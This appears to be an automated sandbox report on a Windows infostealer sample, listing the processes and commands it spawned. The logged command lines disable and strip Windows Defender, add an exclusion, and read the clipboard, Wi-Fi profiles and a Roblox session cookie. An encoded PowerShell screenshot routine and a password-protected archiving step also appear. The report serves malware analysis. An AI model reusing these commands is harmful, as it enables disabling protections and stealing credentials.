              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,68_2_00007FF702C1EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C23144 GetDiskFreeSpaceExW,68_2_00007FF702C23144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
              Source: C:\Users\user\Desktop\HeilHitler.exeMutant created: \Sessions\1\BaseNamedObjects\I
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322Jump to behavior
              Source: HeilHitler.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\HeilHitler.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: HeilHitler.exeReversingLabs: Detection: 47%
              Source: HeilHitler.exeString found in binary or memory: set-addPolicy
              Source: HeilHitler.exeString found in binary or memory: id-cmc-addExtensions
              Source: HeilHitler.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: HeilHitler.exeString found in binary or memory: --help
              Source: HeilHitler.exeString found in binary or memory: --help
              Source: C:\Users\user\Desktop\HeilHitler.exeFile read: C:\Users\user\Desktop\HeilHitler.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
